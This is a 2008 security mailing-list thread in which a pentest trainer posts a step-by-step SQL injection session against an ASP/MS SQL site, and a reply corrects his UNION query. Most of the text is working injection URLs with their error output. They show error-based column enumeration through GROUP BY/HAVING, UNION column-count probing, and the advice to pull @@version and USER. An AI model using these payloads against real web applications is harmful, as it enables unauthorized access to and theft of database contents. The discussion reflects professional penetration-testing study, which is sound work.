|
WebApp Sec
mailing list archives
RE: SQL Injection: Issue with UNION SELECT ALL
From: "Calderon, Juan Carlos (GE, Corporate, consultant)" <juan.calderon () ge com>
Date: Wed, 9 Jan 2008 12:17:13 -0500
Hello Joe
I guess you make a simple mistake the right operator is UNION ALL not SELECT ALL :)
I think this should work
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION ALL SELECT null,null,null--
I suggest you progressively change the nulls one by one by @@version and/or USER to extract the first interesting
pieces of information from the database
Regards,
Juan Carlos Calderon
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Joseph McCray
Sent: Miรฉrcoles, 09 de Enero de 2008 06:02 a.m.
To: webappsec () securityfocus com
Subject: SQL Injection: Issue with UNION SELECT ALL
I'm really having some trouble here understanding and working through these 2 errors I am getting when attacking a host
via SQL Injection using a UNION SELECT ALL statement. I've listed the what I think are relevant references I've found
on the Internet about these error messages so far, and even though this is probably really simple but for some reason
it's just not clicking for me.
1. Operand type clash: text is incompatible with int
Reference Found:
http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html
2. The text, ntext, or image data type cannot be selected as DISTINCT.
References Found:
http://sla.ckers.org/forum/read.php?16,14370,14372 <-- I am using UNION SELECT ALL
http://p2p.wrox.com/topic.asp?whichpage=1&TOPIC_ID=7662๐
http://www.thedatafarm.com/blog/2005/07/12/SELECTsUNIONsAndNtextColumns.aspx <-- I am using UNION SELECT ALL
http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=530757&SiteID=1
The site was vulnerable to login bypass, so it's really not a matter of being able to "get in", I am asking for help
because I want to understand the errors, and of course make my attack process better.
############################################
# Can't Figure Out This UNION SELECT Stuff # ############################################
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 1--
Returns:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their
target lists.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 1,2--
Returns:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their
target lists
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 1,2,3--
Returns:
Operand type clash: text is incompatible with int
Reference Found:
http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html
So I tried this:
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL null--
Returns:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their
target lists.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL null,null--
Returns:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their
target lists
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL null,null,null--
Returns:
The text, ntext, or image data type cannot be selected as DISTINCT.
References Found:
http://sla.ckers.org/forum/read.php?16,14370,14372 <-- I am using UNION SELECT ALL
http://p2p.wrox.com/topic.asp?whichpage=1&TOPIC_ID=7662๐ <-- I am using UNION SELECT ALL
http://www.thedatafarm.com/blog/2005/07/12/SELECTsUNIONsAndNtextColumns.aspx <-- I am using UNION SELECT ALL
http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=530757&SiteID=1
<-- Hmmm...Need to get a grip on this.
#####################################
# Table/Column Name Enum works fine #
#####################################
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345
Returns:
Valid page
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345'
Returns:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 having 1=1--
Returns:
Column 'a.id' is invalid in the select list because it is not contained in an aggregate function and there is
no GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id having 1=1--
Returns:
Column 'a.Title' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title having 1=1--
Returns:
Column 'a.Content' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title,a.Content having 1=1--
Returns:
Column 'a.priority' is invalid in the select list because it is not contained in either an aggregate function
or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title,a.Content,a.priority having 1=1--
Returns:
Column 'a.html' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title,a.Content,a.priority,a.html having
1=1--
Returns:
Column 'a.link' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title,a.Content,a.priority,a.html,a.link
having 1=1--
Returns:
Column 'a.url' is invalid in the select list because it is not contained in either an aggregate function or the
GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url having 1=1--
Returns:
Column 'a.parent' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent having
1=1--
Returns:
Column 'a.static_index' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index having 1=1--
Returns:
Column 'a.hidden' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden having 1=1--
Returns:
Column 'a.approved' is invalid in the select list because it is not contained in either an aggregate function
or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved having 1=1--
Returns:
Column 'a.AutoApprove' is invalid in the select list because it is not contained in either an aggregate
function or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove having
1=1--
Returns:
Column 'a.AutoDisapprove' is invalid in the select list because it is not contained in either an aggregate
function or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove
having 1=1--
Returns:
Column 'a.lvl' is invalid in the select list because it is not contained in either an aggregate function or the
GROUP BY clause
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl
having 1=1--
Returns:
Column 'a.membertypes' is invalid in the select list because it is not contained in either an aggregate
function or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl,a.membertypes
having 1=1--
Returns:
Column 'a.lastupdated_time' is invalid in the select list because it is not contained in either an aggregate
function or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl,a.membertypes,a.lastupdated_time
having 1=1--
Returns:
You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...
Microsoft VBScript runtime error '800a01a8'
Object required: 'getrecordset(...)'
You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...
Microsoft VBScript runtime error '800a01a8'
Object required: 'getrecordset(...)' You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...
Microsoft VBScript runtime error '800a01a8'
Object required: 'getrecordset(...)'
--
Joe McCray
Toll Free: 1-866-892-2132
Email: joe () learnsecurityonline com
Web: https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games * Simulators
* Challenge Servers * Courses
* Hacking Competitions * Hacklab Access
"The only thing worse than training good employees and losing them
is NOT training your employees and keeping them."
- Zig Ziglar
 By Date 
By Thread
Current thread:
|
Intro
